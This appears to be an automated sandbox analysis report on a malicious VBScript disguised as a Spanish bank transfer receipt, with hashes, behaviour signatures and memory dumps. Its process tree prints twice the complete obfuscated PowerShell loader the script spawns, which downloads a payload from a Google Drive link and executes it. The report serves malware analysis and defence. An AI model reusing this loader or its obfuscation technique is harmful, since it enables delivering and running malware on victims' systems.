Overview

overview

7

Static

static

1

justifican...ia.vbs

windows7-x64

6

justifican...ia.vbs

windows10-2004-x64

7

Analysis

  • max time kernel
    263s
  • max time network
    326s
  • platform
    windows7_x64
  • resource
    win7-20230831-en
  • resource tags

    arch:x64arch:x86image:win7-20230831-enlocale:en-usos:windows7-x64system
  • submitted
    14/10/2023, 03:50

Sharing

Copy URL Twitter E-mail
Report Analysis Logs

General

  • Target

    justificante transferencia.vbs

  • Size

    19KB

  • MD5

    ecef25d68b3185a2a7cfc8b1c733cca6

  • SHA1

    4719776abb4c758373d820fb1b0c2f48262b853e

  • SHA256

    be8b4a9fdb356bbf905f2d413ca1d36a240590f01ebed9375baf5c5ac6e784cd

  • SHA512

    6d10906095af65bc3f8bb6b2e077a6a80f69329ce07aabe89dbaa55e89b7f1a335e166f4582eceedf51f242d29e0f7b911fd505e2f900ec520908ca9a58941c3

  • SSDEEP

    384:1wMFW3zVm6UOIWIc1QGUmuFS5hTV4NyDgy/m6zEM1+hRF2o:1wLU81qHATVYy2D

Score
6/10

Malware Config

Signatures

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of WriteProcessMemory 7 IoCs

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\justificante transferencia.vbs"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2576
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "Function inva9 ([String]$Perso169){$Tetterc=$Perso169.toCharArray();For($Mono=5; $Mono -lt $Tetterc.count-1; $Mono+=(5+1)){$Ludgatea+=$Tetterc[$Mono]};$Ludgatea;}$Indenlan=inva9 'happehNonaftFormbtVadefpMortasPresu:Brooc/Bereg/KombidAfsynrNektaiCoffev GeteeMonum. unligNonhooDelysoLandsgPhenalAstraeGlobu.AdamicVelmaoDoulcmUnraz/EarthuDirigcLadyb?CrispeUnderx UddrpBagvao Subtr HomotBenme=AdherdFolkeoUndiswSprgenParaplVegheoPapiraSubfodOppus&RigatiRetnidDecid= Brud1Force0 inve7OevrefLegio8RheumlSlikmB UlkiR UnanrFerskKFareeGTholuSphycoI LoobT UddauOpvejnInterS ZodikUrinveExisteSieve7ChemivOutwordagvrj PiennfootmmPrecoqGunloTArenaQ notavHuffsxSkarpoOutst-Afndt ';$Ludgatea01=inva9 'RygstiRustneAerolxStewi ';$Golc = inva9 ' Reno\AchrasCambiyTranssPoolwwStatsounstrwHinde6Scler4Geolo\slyngWSvaleiovervnUnderd GeseoParenw HelvsTikkeP MalfoSicklwObsereArbejr BackSPetrahPieceeDissilQuantlIndja\StyrevPraec1Umrke.Sardi0 Radi\MosstpKellioEkspewMorgeeGenlsr TartsPikkehUvejreOplevlFeberl Judd.Hjrnee GennxTilhreUnder ';.($Ludgatea01) (inva9 'Semps$IndlaMSpeciiClausnTincheQuadrrTriqu2Aldid=Pocos$ JatreHandlnPrfabvFonds:BibliwBerutiEvakunKrydsdTomeniRaaolr Skol ') ;.($Ludgatea01) (inva9 ' Ukur$rarefGCysteoFloddlArbejc Udde=Direk$DeperMNutriirestpn UrgeeKohorrDanns2 Snip+ Bort$ NazaG NoncoCongllCocoocsubbi ') ;.($Ludgatea01) (inva9 'Ballo$ChassEattesx Prote PerscHydrouCabiltSolforGomeriEnreg Stryg=Fanta tamar(Alfil(Drypsg Fiduw vrdimSamariTarte KbsvawUdskriSekstnGangb3Ander2Humou_TopbepHammerPuniso UnwecMonogeudgans BattsBligh Kysse-IndisFSyste HoldiPUnlenrDididoUncircWarpoeSaltvsFlskesThyreIAlturdPerus=Polli$oddsb{GypsiPPotenIDeponDBomul} Kalk) Hund.VandrCSagkyo LattmThyromexperaChefgnSpherdUneniLIndigiPseudnSnegleFulvo)Slisk oplys-CircusRocsfp NonplKandiiAppeatForsk Nonc[OverpcUvsenhResuba SpkkrTavel]Citer3Pulve4Metal ');.($Ludgatea01) (inva9 'Omsor$SuperSProtuqFagreuSmudsaKennilOptaklVemodeSultr1Rudek8fabri6Vaade Ristn=Hjems Drumb$spekuE ReflxHogsteOverwcglareuPreintEksplrTransiEnwom[Aarhu$PolynEAfvisxSlange Manic Kontu CountAksecrBerediKofte. SlbecQuareoNonenu SmugnSeptetBland-Skriv2 leio]Lugtu ');.($Ludgatea01) (inva9 'Forls$GoutwIBrevdnSprindPlaysuOppussPatritSemifrHjems=Intox(DetesTSicameNemopsArbejtSlutv-TetraPBlytkaVekset Unwoh Brug Mini$SisalGMaffio AppelLegisc brne)Ricoc harem-anatiABidstnNicoldAdden foinr(Stige[SolbrI distnPolvetParadPCalqutBlennrThumb]Exude:Srtsl: ReplsDichtiPhlebz bevie Char Mesor-module GenkqIndpi Snurr8Busli)Stvri ') ;if ($Industr) {.$Golc $Squalle186;} else {;$Ludgatea00=inva9 'hymenSBondetFarbra EdderTeughtBombe-EnjelBFordriDiagut Tryls NondTPrtenrsurcuaMaskinHicorsafbagfSemiaeEksisrInsol Uneff-SibspSEsseno RenluArticr Detec sideeDogma Bogmr$ NakiIAffolnRhoutdOpinieClausnSacoplLaboraNonasnDocre Raste-UnallDRehboe BatcsSimbetPortviUterunBouquaRelatt Kugliwaivoo BullnParep prebr$TormsM FladiIncomnDisjueMilitrantik2Poeti ';.($Ludgatea01) (inva9 ' Genn$DamebMNouili villnstiliesemiarAften2Handl=Absci$ ExcoeEntrenRefrnvIdiot:UnfaraInterpLouispOsmopdWomanaTubultmuscoaVibra ') ;.($Ludgatea01) (inva9 'TydelIHandemJomfrpEfteroInsenrDrafttpratt-aegopM Corto BackdMismauKnivalLazareNatio CountBLavroiLyonetGeophsStandTWeywarMontyaNaphtnGodkesChromfInfile ProprHoops ') ;$Miner2=$Miner2+'\Ipom.Bli';while (-not $Turbodyna) {.($Ludgatea01) (inva9 'Corbi$LaureTManatu AmplrForrebAandeo Forsd Famiy SurmnNytegaEncas=Majes(MonarTUdsugeVejrmsPlovftJangl- MoneP TraaaBivogtPinxthMicro Super$HolocMNewsiiBloodnMyrtae Miskr Kern2Mater)Quizz ') ;.($Ludgatea01) $Ludgatea00;.($Ludgatea01) (inva9 'SvartSSlouctSlikmaMailbrKrybstPseud- FldeSBeakil BolleAtomre GummpAmido Smrke5Overl ');}.($Ludgatea01) (inva9 'Monac$AddleiLngdenKludgvLgnhaaBrles Kuomi=bedek pragtGGadekeVersat Tarv-FormaC tilkoJodpanIndtrtretimeUnternPettitPerpe Outs$FlighM PliniNyerhnJonisemoirbrSjusk2Baand ');.($Ludgatea01) (inva9 'Datam$BesegF FrotrTanteiAnapssKrftsrVandai MastnKatold Dunie BedsrSuper Immun=Subwo threo[falanSSorehybetjesLinietTricheAfreamGenan.KvartCSuperoOversnUnsugvVildtePlanersydvetVacat]Arthr:Forti: DisoFTartarAndrooPallomSamplBRadioagiorgsUdrinelinar6Trill4SuccuSUndeftIkrafrWarraiAndelnForldg Bona(Contr$DiaphiScitanLacunvSavagaUnacq)Upper ');.($Ludgatea01) (inva9 'Cruci$AciduL RadiuAnnegd UnwogTricea BeggtConteeMisbra Polo2Brawl Dendr= Remu photo[DehorSelforyIncomsAncietVehefeOecusmKrasb.SbefaT ClupeLnkorxSystetLogic.SemifEEradinThorncFlatboTalpidVocabiPlushnHklengOnker] Dnni:Yello:KontrAUdramSTilstCHundeISandwITomas. SpriG UlaseNondetCheirS UnmetTuvalr poiniSkbnenCaprigSplas(Katal$ForheF FargrStrobiBratssFouqurRekviiDelebnSprogd PolyeStrafrImmun)Overp ');.($Ludgatea01) (inva9 'Foppi$MrkesPNonspoServirAfrimtOralehErgotvIllumlStrbevKusto=hurtl$LoanwLFalleuFagpedSolisgDuodeaIntertAppeneDistraUhder2Nitri.GoerisTruenuEpiphbSchissSnakst undirGummiiStormnModulgPatro(Dysle2 Fitt8Savor8Peban7Brevs2Jimmf1Gemme,massa2Exact4Paahi6Omnir6Kilde3intru)Oesop ');.($Ludgatea01) $Porthvlv;}"
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:284
      • C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "Function inva9 ([String]$Perso169){$Tetterc=$Perso169.toCharArray();For($Mono=5; $Mono -lt $Tetterc.count-1; $Mono+=(5+1)){$Ludgatea+=$Tetterc[$Mono]};$Ludgatea;}$Indenlan=inva9 'happehNonaftFormbtVadefpMortasPresu:Brooc/Bereg/KombidAfsynrNektaiCoffev GeteeMonum. unligNonhooDelysoLandsgPhenalAstraeGlobu.AdamicVelmaoDoulcmUnraz/EarthuDirigcLadyb?CrispeUnderx UddrpBagvao Subtr HomotBenme=AdherdFolkeoUndiswSprgenParaplVegheoPapiraSubfodOppus&RigatiRetnidDecid= Brud1Force0 inve7OevrefLegio8RheumlSlikmB UlkiR UnanrFerskKFareeGTholuSphycoI LoobT UddauOpvejnInterS ZodikUrinveExisteSieve7ChemivOutwordagvrj PiennfootmmPrecoqGunloTArenaQ notavHuffsxSkarpoOutst-Afndt ';$Ludgatea01=inva9 'RygstiRustneAerolxStewi ';$Golc = inva9 ' Reno\AchrasCambiyTranssPoolwwStatsounstrwHinde6Scler4Geolo\slyngWSvaleiovervnUnderd GeseoParenw HelvsTikkeP MalfoSicklwObsereArbejr BackSPetrahPieceeDissilQuantlIndja\StyrevPraec1Umrke.Sardi0 Radi\MosstpKellioEkspewMorgeeGenlsr TartsPikkehUvejreOplevlFeberl Judd.Hjrnee GennxTilhreUnder ';.($Ludgatea01) (inva9 'Semps$IndlaMSpeciiClausnTincheQuadrrTriqu2Aldid=Pocos$ JatreHandlnPrfabvFonds:BibliwBerutiEvakunKrydsdTomeniRaaolr Skol ') ;.($Ludgatea01) (inva9 ' Ukur$rarefGCysteoFloddlArbejc Udde=Direk$DeperMNutriirestpn UrgeeKohorrDanns2 Snip+ Bort$ NazaG NoncoCongllCocoocsubbi ') ;.($Ludgatea01) (inva9 'Ballo$ChassEattesx Prote PerscHydrouCabiltSolforGomeriEnreg Stryg=Fanta tamar(Alfil(Drypsg Fiduw vrdimSamariTarte KbsvawUdskriSekstnGangb3Ander2Humou_TopbepHammerPuniso UnwecMonogeudgans BattsBligh Kysse-IndisFSyste HoldiPUnlenrDididoUncircWarpoeSaltvsFlskesThyreIAlturdPerus=Polli$oddsb{GypsiPPotenIDeponDBomul} Kalk) Hund.VandrCSagkyo LattmThyromexperaChefgnSpherdUneniLIndigiPseudnSnegleFulvo)Slisk oplys-CircusRocsfp NonplKandiiAppeatForsk Nonc[OverpcUvsenhResuba SpkkrTavel]Citer3Pulve4Metal ');.($Ludgatea01) (inva9 'Omsor$SuperSProtuqFagreuSmudsaKennilOptaklVemodeSultr1Rudek8fabri6Vaade Ristn=Hjems Drumb$spekuE ReflxHogsteOverwcglareuPreintEksplrTransiEnwom[Aarhu$PolynEAfvisxSlange Manic Kontu CountAksecrBerediKofte. SlbecQuareoNonenu SmugnSeptetBland-Skriv2 leio]Lugtu ');.($Ludgatea01) (inva9 'Forls$GoutwIBrevdnSprindPlaysuOppussPatritSemifrHjems=Intox(DetesTSicameNemopsArbejtSlutv-TetraPBlytkaVekset Unwoh Brug Mini$SisalGMaffio AppelLegisc brne)Ricoc harem-anatiABidstnNicoldAdden foinr(Stige[SolbrI distnPolvetParadPCalqutBlennrThumb]Exude:Srtsl: ReplsDichtiPhlebz bevie Char Mesor-module GenkqIndpi Snurr8Busli)Stvri ') ;if ($Industr) {.$Golc $Squalle186;} else {;$Ludgatea00=inva9 'hymenSBondetFarbra EdderTeughtBombe-EnjelBFordriDiagut Tryls NondTPrtenrsurcuaMaskinHicorsafbagfSemiaeEksisrInsol Uneff-SibspSEsseno RenluArticr Detec sideeDogma Bogmr$ NakiIAffolnRhoutdOpinieClausnSacoplLaboraNonasnDocre Raste-UnallDRehboe BatcsSimbetPortviUterunBouquaRelatt Kugliwaivoo BullnParep prebr$TormsM FladiIncomnDisjueMilitrantik2Poeti ';.($Ludgatea01) (inva9 ' Genn$DamebMNouili villnstiliesemiarAften2Handl=Absci$ ExcoeEntrenRefrnvIdiot:UnfaraInterpLouispOsmopdWomanaTubultmuscoaVibra ') ;.($Ludgatea01) (inva9 'TydelIHandemJomfrpEfteroInsenrDrafttpratt-aegopM Corto BackdMismauKnivalLazareNatio CountBLavroiLyonetGeophsStandTWeywarMontyaNaphtnGodkesChromfInfile ProprHoops ') ;$Miner2=$Miner2+'\Ipom.Bli';while (-not $Turbodyna) {.($Ludgatea01) (inva9 'Corbi$LaureTManatu AmplrForrebAandeo Forsd Famiy SurmnNytegaEncas=Majes(MonarTUdsugeVejrmsPlovftJangl- MoneP TraaaBivogtPinxthMicro Super$HolocMNewsiiBloodnMyrtae Miskr Kern2Mater)Quizz ') ;.($Ludgatea01) $Ludgatea00;.($Ludgatea01) (inva9 'SvartSSlouctSlikmaMailbrKrybstPseud- FldeSBeakil BolleAtomre GummpAmido Smrke5Overl ');}.($Ludgatea01) (inva9 'Monac$AddleiLngdenKludgvLgnhaaBrles Kuomi=bedek pragtGGadekeVersat Tarv-FormaC tilkoJodpanIndtrtretimeUnternPettitPerpe Outs$FlighM PliniNyerhnJonisemoirbrSjusk2Baand ');.($Ludgatea01) (inva9 'Datam$BesegF FrotrTanteiAnapssKrftsrVandai MastnKatold Dunie BedsrSuper Immun=Subwo threo[falanSSorehybetjesLinietTricheAfreamGenan.KvartCSuperoOversnUnsugvVildtePlanersydvetVacat]Arthr:Forti: DisoFTartarAndrooPallomSamplBRadioagiorgsUdrinelinar6Trill4SuccuSUndeftIkrafrWarraiAndelnForldg Bona(Contr$DiaphiScitanLacunvSavagaUnacq)Upper ');.($Ludgatea01) (inva9 'Cruci$AciduL RadiuAnnegd UnwogTricea BeggtConteeMisbra Polo2Brawl Dendr= Remu photo[DehorSelforyIncomsAncietVehefeOecusmKrasb.SbefaT ClupeLnkorxSystetLogic.SemifEEradinThorncFlatboTalpidVocabiPlushnHklengOnker] Dnni:Yello:KontrAUdramSTilstCHundeISandwITomas. SpriG UlaseNondetCheirS UnmetTuvalr poiniSkbnenCaprigSplas(Katal$ForheF FargrStrobiBratssFouqurRekviiDelebnSprogd PolyeStrafrImmun)Overp ');.($Ludgatea01) (inva9 'Foppi$MrkesPNonspoServirAfrimtOralehErgotvIllumlStrbevKusto=hurtl$LoanwLFalleuFagpedSolisgDuodeaIntertAppeneDistraUhder2Nitri.GoerisTruenuEpiphbSchissSnakst undirGummiiStormnModulgPatro(Dysle2 Fitt8Savor8Peban7Brevs2Jimmf1Gemme,massa2Exact4Paahi6Omnir6Kilde3intru)Oesop ');.($Ludgatea01) $Porthvlv;}"
        3⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:2888

Network

        MITRE ATT&CK Enterprise v15

        Replay Monitor

        Loading Replay Monitor...

        Downloads

        • C:\Users\Admin\AppData\Local\Temp\CabC4A6.tmp
          Filesize

          61KB

          MD5

          f3441b8572aae8801c04f3060b550443

          SHA1

          4ef0a35436125d6821831ef36c28ffaf196cda15

          SHA256

          6720349e7d82ee0a8e73920d3c2b7cb2912d9fcf2edb6fd98f2f12820158b0bf

          SHA512

          5ba01ba421b50030e380ae6bbcd2f681f2a91947fe7fedb3c8e6b5f24dce9517abf57b1cf26cc6078d4bb53bde6fcfb2561591337c841f8f2cb121a3d71661b9

          Download Submit

        • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\W2OP7SSDG9XVKO8M8U81.temp
          Filesize

          7KB

          MD5

          04267ec589e7074bdcd333958f99b71d

          SHA1

          d0ca2b6b3f06dbb0c4efdb038d8b75048f348d60

          SHA256

          8e2cb1d917bddffcbaac577f89d14403de4d721362b135dc8f892bb5fd518821

          SHA512

          7c44f1fad72f83f9282428f463330fef7451bc4bd73ed10761920db901d51c0dd0f43daff395557ef6672bd18fe9dad9f0a262a8be9331815dcf81fb215ad0ca

          Download Submit

        • memory/284-35-0x0000000002580000-0x0000000002600000-memory.dmp

          Filesize

          512KB

          Download

        • memory/284-11-0x000000001B270000-0x000000001B552000-memory.dmp

          Filesize

          2.9MB

          Download

        • memory/284-15-0x0000000002580000-0x0000000002600000-memory.dmp

          Filesize

          512KB

          Download

        • memory/284-16-0x0000000002580000-0x0000000002600000-memory.dmp

          Filesize

          512KB

          Download

        • memory/284-17-0x000007FEF5DB0000-0x000007FEF674D000-memory.dmp

          Filesize

          9.6MB

          Download

        • memory/284-13-0x000007FEF5DB0000-0x000007FEF674D000-memory.dmp

          Filesize

          9.6MB

          Download

        • memory/284-37-0x0000000002580000-0x0000000002600000-memory.dmp

          Filesize

          512KB

          Download

        • memory/284-36-0x0000000002580000-0x0000000002600000-memory.dmp

          Filesize

          512KB

          Download

        • memory/284-14-0x0000000002580000-0x0000000002600000-memory.dmp

          Filesize

          512KB

          Download

        • memory/284-34-0x0000000002580000-0x0000000002600000-memory.dmp

          Filesize

          512KB

          Download

        • memory/284-24-0x000007FEF5DB0000-0x000007FEF674D000-memory.dmp

          Filesize

          9.6MB

          Download

        • memory/284-12-0x0000000002300000-0x0000000002308000-memory.dmp

          Filesize

          32KB

          Download

        • memory/2888-23-0x00000000739E0000-0x0000000073F8B000-memory.dmp

          Filesize

          5.7MB

          Download

        • memory/2888-21-0x00000000024B0000-0x00000000024F0000-memory.dmp

          Filesize

          256KB

          Download

        • memory/2888-22-0x00000000024B0000-0x00000000024F0000-memory.dmp

          Filesize

          256KB

          Download

        • memory/2888-20-0x00000000739E0000-0x0000000073F8B000-memory.dmp

          Filesize

          5.7MB

          Download

        • memory/2888-38-0x00000000739E0000-0x0000000073F8B000-memory.dmp

          Filesize

          5.7MB

          Download

        • memory/2888-39-0x00000000024B0000-0x00000000024F0000-memory.dmp

          Filesize

          256KB

          Download

        • memory/2888-40-0x00000000739E0000-0x0000000073F8B000-memory.dmp

          Filesize

          5.7MB

          Download